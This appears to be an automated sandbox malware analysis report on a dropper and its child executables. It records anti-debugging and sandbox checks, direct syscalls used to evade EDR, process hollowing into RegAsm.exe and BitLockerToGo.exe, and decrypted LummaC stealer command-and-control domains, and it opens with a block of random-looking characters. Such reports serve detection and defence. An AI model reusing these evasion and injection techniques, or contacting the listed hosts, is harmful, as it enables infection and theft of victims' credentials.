XQYPSRDBZA\JZVNUEPUZXCOHYXBIXXTHBKZXKMENNCPQHOOCSKRLUZZBU0JEZKZRRKYGZFBZZANNEPWBXVhNADKTONGHAOGIGIHEHBTZKBBUGOZLOQBBUIAULKJKLRWQYQHSFHPZRWHDCCPPCMEHGLRDZQTIOJPAGQGWJBTAVWYVYQVWTXVIObFASDLKNWEIUWOQOGMFUDQQNSMETQOSUKBARVPLPLPJOFHRCMT6DHKHFEQPKVBFUICMRSSCHKHGSDHDEQSTSXTUOBFMBZUHIZPKVCEYQFRJNNOQSVhWZUQVXLXPDLVVHCVQLMYQOQIMBGFPNMZZHLDUEFHDAYKBHSYKYKHLBRPNXAMMEXLEICPSQASKFOXAKQWFNYLMDDQCSN0HDHYGMYAFMMADBFVFXAHJUYWLVWJWIPAPSGTNFKHUYZIIJDWTLVOENQMKEMBVCRAKNDHULOHYDMKVGEBMCUKXBSHCOQTCIEJVEGROPHJGXWFLGUYDXTOWGKTCGDOLFYWFjUTYUNXFPVPTERQHYGJXLKEVNYDWIVBZXJQAEVKUMXLBRKNMWGQVARvLGMMMTHMSAUPNSPKWFXSIDYLGVDORGTZRGMZWSXMDATKGCUIYIOBFVQIIAF8EAUPJRSTWQERVNGWLGGDLEOCIULT<GXALPBIVLOIDYAJCURHEHUIBBDDVVPfQVIXYNZAAMYGGMGHHQBSSTJIIAGJHEMWMVJMZMEDZMBYLHXOLHVbLBYXFWJUFYJNMLRYABOBVFZDOVPSRMAQCSSSJYGBKLMNNNQGFlWZHVFCYAKPGBBJHQWPVEVVEXHYLSDRAMLSIHXBYLQTOISFGRFIVIFV`WGYUYFMOVRCWXNZQUNFHYPDGKDGMTFIFVYKJTMOIBCZTTZVK(KNTNMYRUGYMDDIFSAYUZNGWWXDXQFOBYLRPTMGOGBFKCWKMZUDMPTWZUXONV`QXIFHNZGXFNADAIVXXLBVXSHUUJCXCEXDVTQFKGOCZPJHOKDbMSETADBRRLEXYTHZYPGFZUAQEASPAMBQEVTZLXBFLYAVPHBBZrUBCHXJBUZHULAOZCRJMORPTXMMRAVUPGKQYBXARRMGUTATAIAOZSNKGFIHHHAYIBSKUVCAXEMJLVRDFYKBVPYXMWAQNHLKbFJWZCSDUXYULNPTCEDDJNZQTLGT
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000DCA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW`
Source: kPy9KuGWnhtidoY4IdmVbiaT.exe, 00000007.00000002.3125271481.000000000148E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware.(
Source: uht_7KlzJBHoKg010MzYxndX.exe, 0000000B.00000002.2650297590.000000000146C000.00000004.00000020.00020000.00000000.sdmp, m9GWTeQylsPUCcnTEkTCS8lf.exe, 0000000C.00000002.2684793497.000000000190E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: B4LiZFzJ_IAKzmYhwI_ve0Iy.exe, 00000009.00000000.2384928035.0000000000612000.00000002.00000001.01000000.0000000D.sdmp	Binary or memory string: DEURKUJUSGIWVQOPRPWDRMHVYYEHDFBZIPNXTCMQEMUHYDLVICQWEFGRWZTLPCRMFJNFCQWPCFY

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API call chain: ExitProcess graph end node

Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	File opened: NTICE
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	File opened: SICE
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	File opened: SIWVID

Source: C:\Users\user\Documents\iofolko5\l6BAwR4854FJ5LVXvo8GWfAt.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\l6BAwR4854FJ5LVXvo8GWfAt.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process queried: DebugPort
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process queried: DebugPort

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 22_2_0041ACFA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

22_2_0041ACFA

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 22_2_00404610 VirtualProtect ?,00000004,00000100,00000000

22_2_00404610

Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe

Code function: 14_2_00406312 GetModuleHandleA,LoadLibraryA,GetProcAddress,

14_2_00406312

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00432CB0 mov eax, dword ptr fs:[00000030h]	2_2_00432CB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00432CB0 mov eax, dword ptr fs:[00000030h]	2_2_00432CB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_00419160 mov eax, dword ptr fs:[00000030h]	22_2_00419160

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 22_2_00405000 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetOpenUrlA,InternetReadFile,memcpy,InternetCloseHandle,InternetCloseHandle,

22_2_00405000

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process token adjusted: Debug

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_0041C8D9 SetUnhandledExceptionFilter,	22_2_0041C8D9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_0041ACFA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	22_2_0041ACFA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_0041A718 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	22_2_0041A718
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_69CBAC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	22_2_69CBAC62

Source: C:\Users\user\Desktop\FileApp.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: Process Memory Space: kPy9KuGWnhtidoY4IdmVbiaT.exe PID: 3048, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: DSN_5xuwaC5nkP_MHzd7lLTl.exe PID: 7060, type: MEMORYSTR

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\FileApp.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\xNc0eiwaHinah8TaPUA3TuXZ.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\DSN_5xuwaC5nkP_MHzd7lLTl.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\uht_7KlzJBHoKg010MzYxndX.exe	Memory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\m9GWTeQylsPUCcnTEkTCS8lf.exe	Memory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write

Contains functionality to inject code into remote processes

Source: C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe

Code function: 5_2_030E2591 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessA,CreateProcessA,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,

5_2_030E2591

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Users\user\Documents\iofolko5\5Qs0KV98dc5QrQIgi5l7CPu5.exe	NtProtectVirtualMemory: Direct from: 0x140F68E97	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\5Qs0KV98dc5QrQIgi5l7CPu5.exe	NtProtectVirtualMemory: Direct from: 0x14184DA5A	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\5Qs0KV98dc5QrQIgi5l7CPu5.exe	NtProtectVirtualMemory: Direct from: 0x140F42CBC	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\5Qs0KV98dc5QrQIgi5l7CPu5.exe	NtClose: Direct from: 0x141791AC9
Source: C:\Users\user\Documents\iofolko5\5Qs0KV98dc5QrQIgi5l7CPu5.exe	NtProtectVirtualMemory: Direct from: 0x14183B5C6	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\5Qs0KV98dc5QrQIgi5l7CPu5.exe	NtMapViewOfSection: Direct from: 0x1417C8CFD	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\5Qs0KV98dc5QrQIgi5l7CPu5.exe	NtOpenFile: Direct from: 0x141829079	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\5Qs0KV98dc5QrQIgi5l7CPu5.exe	NtProtectVirtualMemory: Direct from: 0x140F741E1	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\5Qs0KV98dc5QrQIgi5l7CPu5.exe	NtProtectVirtualMemory: Direct from: 0x141821A46	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\5Qs0KV98dc5QrQIgi5l7CPu5.exe	NtUnmapViewOfSection: Direct from: 0x14181B636	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\5Qs0KV98dc5QrQIgi5l7CPu5.exe	NtProtectVirtualMemory: Direct from: 0x141817E99	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\5Qs0KV98dc5QrQIgi5l7CPu5.exe	NtProtectVirtualMemory: Indirect: 0x140F2B0BD	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\FileApp.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\xNc0eiwaHinah8TaPUA3TuXZ.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe	Memory written: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\DSN_5xuwaC5nkP_MHzd7lLTl.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\uht_7KlzJBHoKg010MzYxndX.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\m9GWTeQylsPUCcnTEkTCS8lf.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Memory written: C:\ProgramData\jewkkwnf\jewkkwnf.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe	Memory written: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe base: 400000 value starts with: 4D5A

LummaC encrypted strings found

Source: uht_7KlzJBHoKg010MzYxndX.exe, 0000000B.00000002.2733299099.0000000001B50000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: caffegclasiqwp.shop
Source: uht_7KlzJBHoKg010MzYxndX.exe, 0000000B.00000002.2733299099.0000000001B50000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: stamppreewntnq.shop
Source: uht_7KlzJBHoKg010MzYxndX.exe, 0000000B.00000002.2733299099.0000000001B50000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: stagedchheiqwo.shop
Source: uht_7KlzJBHoKg010MzYxndX.exe, 0000000B.00000002.2733299099.0000000001B50000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: millyscroqwp.shop
Source: uht_7KlzJBHoKg010MzYxndX.exe, 0000000B.00000002.2733299099.0000000001B50000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: evoliutwoqm.shop
Source: uht_7KlzJBHoKg010MzYxndX.exe, 0000000B.00000002.2733299099.0000000001B50000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: condedqpwqm.shop
Source: uht_7KlzJBHoKg010MzYxndX.exe, 0000000B.00000002.2733299099.0000000001B50000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: traineiwnqo.shop
Source: uht_7KlzJBHoKg010MzYxndX.exe, 0000000B.00000002.2733299099.0000000001B50000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: locatedblsoqp.shop

Searches for specific processes (likely to inject)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 22_2_004190A0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

22_2_004190A0

Writes to foreign memory regions

Source: C:\Users\user\Desktop\FileApp.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\FileApp.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\FileApp.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 56B000	Jump to behavior
Source: C:\Users\user\Desktop\FileApp.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 58A000	Jump to behavior
Source: C:\Users\user\Desktop\FileApp.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 592000	Jump to behavior
Source: C:\Users\user\Desktop\FileApp.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 5D8000	Jump to behavior
Source: C:\Users\user\Desktop\FileApp.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: A0B008	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 456000	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 484000	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 10F1008	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\xNc0eiwaHinah8TaPUA3TuXZ.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\xNc0eiwaHinah8TaPUA3TuXZ.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\xNc0eiwaHinah8TaPUA3TuXZ.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 432000	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\xNc0eiwaHinah8TaPUA3TuXZ.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 450000	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\xNc0eiwaHinah8TaPUA3TuXZ.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 60A008	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\DSN_5xuwaC5nkP_MHzd7lLTl.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\DSN_5xuwaC5nkP_MHzd7lLTl.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\DSN_5xuwaC5nkP_MHzd7lLTl.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 42F000	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\DSN_5xuwaC5nkP_MHzd7lLTl.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43C000	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\DSN_5xuwaC5nkP_MHzd7lLTl.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 651000	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\DSN_5xuwaC5nkP_MHzd7lLTl.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 652000	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\DSN_5xuwaC5nkP_MHzd7lLTl.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 835008	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\uht_7KlzJBHoKg010MzYxndX.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2E40008	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\uht_7KlzJBHoKg010MzYxndX.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\uht_7KlzJBHoKg010MzYxndX.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 401000	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\uht_7KlzJBHoKg010MzYxndX.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 443000	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\uht_7KlzJBHoKg010MzYxndX.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 446000	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\uht_7KlzJBHoKg010MzYxndX.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 456000	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\m9GWTeQylsPUCcnTEkTCS8lf.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2F06008	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\m9GWTeQylsPUCcnTEkTCS8lf.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\m9GWTeQylsPUCcnTEkTCS8lf.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 401000	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\m9GWTeQylsPUCcnTEkTCS8lf.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 440000	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\m9GWTeQylsPUCcnTEkTCS8lf.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 443000	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\m9GWTeQylsPUCcnTEkTCS8lf.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 452000	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
Source: C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 41E000
Source: C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 42B000
Source: C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 63E000
Source: C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: B09008

Source: C:\Users\user\Desktop\FileApp.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\xNc0eiwaHinah8TaPUA3TuXZ.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe	Process created: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe "C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe"	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\DSN_5xuwaC5nkP_MHzd7lLTl.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\uht_7KlzJBHoKg010MzYxndX.exe	Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\m9GWTeQylsPUCcnTEkTCS8lf.exe	Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Command Command.bat & Command.bat & exit
Source: C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 5644 -ip 5644
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5644 -s 824
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userFBKKJEBFID.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userEHJKFCGHID.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
